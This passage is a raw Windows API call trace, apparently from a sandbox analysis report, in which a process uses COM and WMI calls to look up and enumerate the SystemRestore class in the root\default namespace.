Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e59c | out: ppvObject=0x41e59c*=0x0) returned 0x80004002 [0112.871] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e3bc | out: ppvObject=0x41e3bc*=0x0) returned 0x80004002 [0112.872] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0112.872] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41defc | out: ppvObject=0x41defc*=0x0) returned 0x80004002 [0112.872] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41deac | out: ppvObject=0x41deac*=0x0) returned 0x80004002 [0112.872] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41deb8 | out: ppvObject=0x41deb8*=0x780b64) returned 0x0 [0112.873] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780b64, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dec0 | out: pCid=0x41dec0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0112.873] WbemLocator:IUnknown:Release (This=0x780b64) returned 0x3 [0112.873] CoGetContextToken (in: pToken=0x41df18 | out: pToken=0x41df18) returned 0x0 [0112.873] CoGetContextToken (in: pToken=0x41e320 | out: pToken=0x41e320) returned 0x0 [0112.873] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e3b0 | out: ppvObject=0x41e3b0*=0x780bec) returned 0x0 [0112.873] WbemLocator:IRpcOptions:Query (in: This=0x780bec, pPrx=0x780c04, dwProperty=2, pdwValue=0x41e3d8 | out: pdwValue=0x41e3d8) returned 0x80004002 [0112.873] WbemLocator:IUnknown:Release (This=0x780bec) returned 0x3 [0112.873] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0112.873] CoGetContextToken (in: pToken=0x41e8f0 | out: pToken=0x41e8f0) returned 0x0 [0112.873] CoGetContextToken (in: pToken=0x41e850 | out: pToken=0x41e850) returned 0x0 [0112.873] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x41e920*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x41e91c | out: ppvObject=0x41e91c*=0x673670c) returned 0x0 [0112.873] WbemLocator:IUnknown:AddRef (This=0x673670c) returned 0x4 [0112.874] WbemLocator:IUnknown:Release (This=0x673670c) returned 0x3 [0112.874] WbemLocator:IUnknown:Release (This=0x673670c) returned 0x2 [0112.874] SysStringLen (param_1=0x0) returned 0x0 [0112.874] CoGetContextToken (in: pToken=0x41e928 | out: pToken=0x41e928) returned 0x0 [0112.874] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0112.874] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e7bc | out: ppvObject=0x41e7bc*=0x780c04) returned 0x0 [0112.874] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0112.874] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0112.874] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec34 | out: puCount=0x41ec34*=0x2) returned 0x0 [0112.874] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec30*=0x0, pszText=0x0 | out: puBuffLength=0x41ec30*=0x11, pszText=0x0) returned 0x0 [0112.874] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec30*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec30*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0112.874] CoGetContextToken (in: pToken=0x41e8a0 | out: pToken=0x41e8a0) returned 0x0 [0112.874] WbemLocator:IUnknown:AddRef (This=0x780c04) returned 0x3 [0112.874] WbemLocator:IUnknown:QueryInterface (in: This=0x780c04, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e734 | out: ppvObject=0x41e734*=0x780c04) returned 0x0 [0112.874] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x3 [0112.875] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x2 [0112.875] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=2, puBuffLength=0x41ec38*=0x0, pszText=0x0 | out: puBuffLength=0x41ec38*=0xe, pszText=0x0) returned 0x0 [0112.875] WbemDefPath:IWbemPath:GetText (in: This=0x6730328, lFlags=2, puBuffLength=0x41ec38*=0xe, pszText="0000000000000" | out: puBuffLength=0x41ec38*=0xe, pszText="systemrestore") returned 0x0 [0112.875] IWbemServices:GetObject (in: This=0x673670c, strObjectPath="systemrestore", lFlags=0, pCtx=0x0, ppObject=0x41ebec*=0x0, ppCallResult=0x0 | out: ppObject=0x41ebec*=0x6736720, ppCallResult=0x0) returned 0x0 [0113.027] IWbemClassObject:Get (in: This=0x6736720, wszName="__PATH", lFlags=0, pVal=0x41ebd4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ec7c*=0, plFlavor=0x41ec78*=0 | out: pVal=0x41ebd4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\default:SystemRestore", varVal2=0x0), pType=0x41ec7c*=8, plFlavor=0x41ec78*=64) returned 0x0 [0113.027] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x4c [0113.027] SysStringByteLen (bstr="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x4c [0113.027] CoGetObjectContext (in: riid=0x346e308*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41ebe4 | out: ppv=0x41ebe4*=0x72015c) returned 0x0 [0113.028] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x41ebdc | out: pAptType=0x41ebdc*=1) returned 0x0 [0113.028] IUnknown:QueryInterface (in: This=0x72015c, riid=0x346e2f0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x41ebe0 | out: ppvObject=0x41ebe0*=0x0) returned 0x80004002 [0113.028] IUnknown:Release (This=0x72015c) returned 0x1 [0113.029] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x41e550 | out: ppv=0x41e550*=0x672cce0) returned 0x0 [0113.029] WbemDefPath:IUnknown:QueryInterface (in: This=0x672cce0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e768 | out: ppvObject=0x41e768*=0x0) returned 0x80004002 [0113.029] WbemDefPath:IClassFactory:CreateInstance (in: This=0x672cce0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e77c | out: ppvObject=0x41e77c*=0x6736648) returned 0x0 [0113.029] WbemDefPath:IUnknown:Release (This=0x672cce0) returned 0x0 [0113.029] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e39c | out: ppvObject=0x41e39c*=0x6736648) returned 0x0 [0113.029] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e358 | out: ppvObject=0x41e358*=0x0) returned 0x80004002 [0113.029] WbemDefPath:IUnknown:AddRef (This=0x6736648) returned 0x3 [0113.029] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dcb4 | out: ppvObject=0x41dcb4*=0x0) returned 0x80004002 [0113.030] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dc64 | out: ppvObject=0x41dc64*=0x0) returned 0x80004002 [0113.030] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dc70 | out: ppvObject=0x41dc70*=0x77daa8) returned 0x0 [0113.030] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77daa8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dc78 | out: pCid=0x41dc78*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0113.030] WbemDefPath:IUnknown:Release (This=0x77daa8) returned 0x3 [0113.030] CoGetContextToken (in: pToken=0x41dcd0 | out: pToken=0x41dcd0) returned 0x0 [0113.030] CoGetContextToken (in: pToken=0x41e0d8 | out: pToken=0x41e0d8) returned 0x0 [0113.030] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e168 | out: ppvObject=0x41e168*=0x0) returned 0x80004002 [0113.030] WbemDefPath:IUnknown:Release (This=0x6736648) returned 0x2 [0113.030] WbemDefPath:IUnknown:Release (This=0x6736648) returned 0x1 [0113.030] CoGetContextToken (in: pToken=0x41ea60 | out: pToken=0x41ea60) returned 0x0 [0113.030] CoGetContextToken (in: pToken=0x41e9c0 | out: pToken=0x41e9c0) returned 0x0 [0113.030] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736648, riid=0x41ea90*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x41ea8c | out: ppvObject=0x41ea8c*=0x6736648) returned 0x0 [0113.030] WbemDefPath:IUnknown:AddRef (This=0x6736648) returned 0x3 [0113.030] WbemDefPath:IUnknown:Release (This=0x6736648) returned 0x2 [0113.030] WbemDefPath:IWbemPath:SetText (This=0x6736648, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\default:SystemRestore") returned 0x0 [0113.030] IWbemClassObject:Get (in: This=0x6736720, wszName="__CLASS", lFlags=0, pVal=0x41ec44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x41ecc4*=0, plFlavor=0x41ecc0*=0 | out: pVal=0x41ec44*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SystemRestore", varVal2=0x0), pType=0x41ecc4*=8, plFlavor=0x41ecc0*=64) returned 0x0 [0113.031] SysStringByteLen (bstr="SystemRestore") returned 0x1a [0113.031] SysStringByteLen (bstr="SystemRestore") returned 0x1a [0113.031] CoGetContextToken (in: pToken=0x41ea60 | out: pToken=0x41ea60) returned 0x0 [0113.031] WbemLocator:IUnknown:AddRef (This=0x673670c) returned 0x3 [0113.031] IWbemServices:CreateInstanceEnum (in: This=0x673670c, strFilter="SystemRestore", lFlags=17, pCtx=0x0, ppEnum=0x41ec40 | out: ppEnum=0x41ec40*=0x67369fc) returned 0x0 [0113.034] IUnknown:QueryInterface (in: This=0x67369fc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41ead8 | out: ppvObject=0x41ead8*=0x6736a00) returned 0x0 [0113.035] IClientSecurity:QueryBlanket (in: This=0x6736a00, pProxy=0x67369fc, pAuthnSvc=0x41eb28, pAuthzSvc=0x41eb24, pServerPrincName=0x41eb1c, pAuthnLevel=0x41eb20, pImpLevel=0x41eb10, pAuthInfo=0x41eb14, pCapabilites=0x41eb18 | out: pAuthnSvc=0x41eb28*=0xa, pAuthzSvc=0x41eb24*=0x0, pServerPrincName=0x41eb1c, pAuthnLevel=0x41eb20*=0x6, pImpLevel=0x41eb10*=0x2, pAuthInfo=0x41eb14, pCapabilites=0x41eb18*=0x1) returned 0x0 [0113.035] IUnknown:Release (This=0x6736a00) returned 0x1 [0113.035] IUnknown:QueryInterface (in: This=0x67369fc, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41eacc | out: ppvObject=0x41eacc*=0x780b14) returned 0x0 [0113.035] IUnknown:QueryInterface (in: This=0x67369fc, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41eac8 | out: ppvObject=0x41eac8*=0x6736a00) returned 0x0 [0113.035] IClientSecurity:SetBlanket (This=0x6736a00, pProxy=0x67369fc, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0113.039] IUnknown:Release (This=0x6736a00) returned 0x2 [0113.039] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x1 [0113.040] CoTaskMemFree (pv=0x77dd88) [0113.040] IUnknown:QueryInterface (in: This=0x67369fc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e6c0 | out: ppvObject=0x41e6c0*=0x780b14) returned 0x0 [0113.040] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e67c | out: ppvObject=0x41e67c*=0x0) returned 0x80004002 [0113.040] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e49c | out: ppvObject=0x41e49c*=0x0) returned 0x80004002 [0113.041] WbemLocator:IUnknown:AddRef (This=0x780b14) returned 0x3 [0113.041] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41dfdc | out: ppvObject=0x41dfdc*=0x0) returned 0x80004002 [0113.041] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41df8c | out: ppvObject=0x41df8c*=0x0) returned 0x80004002 [0113.042] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41df98 | out: ppvObject=0x41df98*=0x780a74) returned 0x0 [0113.042] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780a74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dfa0 | out: pCid=0x41dfa0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0113.042] WbemLocator:IUnknown:Release (This=0x780a74) returned 0x3 [0113.042] CoGetContextToken (in: pToken=0x41dff8 | out: pToken=0x41dff8) returned 0x0 [0113.042] CoGetContextToken (in: pToken=0x41e400 | out: pToken=0x41e400) returned 0x0 [0113.042] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e490 | out: ppvObject=0x41e490*=0x780afc) returned 0x0 [0113.042] WbemLocator:IRpcOptions:Query (in: This=0x780afc, pPrx=0x780b14, dwProperty=2, pdwValue=0x41e4b8 | out: pdwValue=0x41e4b8) returned 0x80004002 [0113.042] WbemLocator:IUnknown:Release (This=0x780afc) returned 0x3 [0113.042] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x2 [0113.042] CoGetContextToken (in: pToken=0x41e9d0 | out: pToken=0x41e9d0) returned 0x0 [0113.042] CoGetContextToken (in: pToken=0x41e930 | out: pToken=0x41e930) returned 0x0 [0113.042] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x41ea00*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x41e9fc | out: ppvObject=0x41e9fc*=0x67369fc) returned 0x0 [0113.043] IUnknown:AddRef (This=0x67369fc) returned 0x4 [0113.043] IUnknown:Release (This=0x67369fc) returned 0x3 [0113.043] IUnknown:Release (This=0x67369fc) returned 0x2 [0113.043] WbemLocator:IUnknown:Release (This=0x673670c) returned 0x2 [0113.043] SysStringLen (param_1=0x0) returned 0x0 [0113.043] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6730c70, puCount=0x41ec7c | out: puCount=0x41ec7c*=0x2) returned 0x0 [0113.043] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec78*=0x0, pszText=0x0 | out: puBuffLength=0x41ec78*=0x11, pszText=0x0) returned 0x0 [0113.043] WbemDefPath:IWbemPath:GetText (in: This=0x6730c70, lFlags=4, puBuffLength=0x41ec78*=0x11, pszText="0000000000000000" | out: puBuffLength=0x41ec78*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0113.043] CoGetContextToken (in: pToken=0x41eac0 | out: pToken=0x41eac0) returned 0x0 [0113.043] IUnknown:AddRef (This=0x67369fc) returned 0x3 [0113.043] IEnumWbemClassObject:Clone (in: This=0x67369fc, ppEnum=0x41ec7c | out: ppEnum=0x41ec7c*=0x6736ac4) returned 0x0 [0113.044] IUnknown:QueryInterface (in: This=0x6736ac4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41eb40 | out: ppvObject=0x41eb40*=0x6736ac8) returned 0x0 [0113.045] IClientSecurity:QueryBlanket (in: This=0x6736ac8, pProxy=0x6736ac4, pAuthnSvc=0x41eb90, pAuthzSvc=0x41eb8c, pServerPrincName=0x41eb84, pAuthnLevel=0x41eb88, pImpLevel=0x41eb78, pAuthInfo=0x41eb7c, pCapabilites=0x41eb80 | out: pAuthnSvc=0x41eb90*=0xa, pAuthzSvc=0x41eb8c*=0x0, pServerPrincName=0x41eb84, pAuthnLevel=0x41eb88*=0x6, pImpLevel=0x41eb78*=0x2, pAuthInfo=0x41eb7c, pCapabilites=0x41eb80*=0x1) returned 0x0 [0113.045] IUnknown:Release (This=0x6736ac8) returned 0x1 [0113.045] IUnknown:QueryInterface (in: This=0x6736ac4, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41eb34 | out: ppvObject=0x41eb34*=0x780ed4) returned 0x0 [0113.045] IUnknown:QueryInterface (in: This=0x6736ac4, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41eb30 | out: ppvObject=0x41eb30*=0x6736ac8) returned 0x0 [0113.045] IClientSecurity:SetBlanket (This=0x6736ac8, pProxy=0x6736ac4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0113.047] IUnknown:Release (This=0x6736ac8) returned 0x2 [0113.047] WbemLocator:IUnknown:Release (This=0x780ed4) returned 0x1 [0113.047] CoTaskMemFree (pv=0x77dde8) [0113.047] IUnknown:QueryInterface (in: This=0x6736ac4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e71c | out: ppvObject=0x41e71c*=0x780ed4) returned 0x0 [0113.047] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x41e6d8 | out: ppvObject=0x41e6d8*=0x0) returned 0x80004002 [0113.047] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x41e4f4 | out: ppvObject=0x41e4f4*=0x0) returned 0x80004002 [0113.048] WbemLocator:IUnknown:AddRef (This=0x780ed4) returned 0x3 [0113.048] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x41e034 | out: ppvObject=0x41e034*=0x0) returned 0x80004002 [0113.048] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x41dfe4 | out: ppvObject=0x41dfe4*=0x0) returned 0x80004002 [0113.049] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41dff0 | out: ppvObject=0x41dff0*=0x780e34) returned 0x0 [0113.049] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780e34, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x41dff8 | out: pCid=0x41dff8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0113.049] WbemLocator:IUnknown:Release (This=0x780e34) returned 0x3 [0113.049] CoGetContextToken (in: pToken=0x41e050 | out: pToken=0x41e050) returned 0x0 [0113.049] CoGetContextToken (in: pToken=0x41e458 | out: pToken=0x41e458) returned 0x0 [0113.049] WbemLocator:IUnknown:QueryInterface (in: This=0x780ed4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x41e4e8 | out: ppvObject=0x41e4e8*=0x780ebc) returned 0x0 [0113.049] WbemLocator:IRpcOptions:Query (in: This=0x780ebc, pPrx=0x780ed4, dwProperty=2, pdwValue=0x41e510 | out: pdwValue=0x41e510) returned 0x80004002 [0113.049] WbemLocator:IUnknown:Release (This=0x780ebc) returned 0x3 [0113.049] WbemLocator:IUnknown:Release (This=0x780ed4) returned 0x2 [0113.049] CoGetContextToken (in: pToken=0x41ea30 | out: pToken=0x41ea30) returned 0x0 [0113.049] CoGetContextToken (in: pToken=0x41e990 | out: 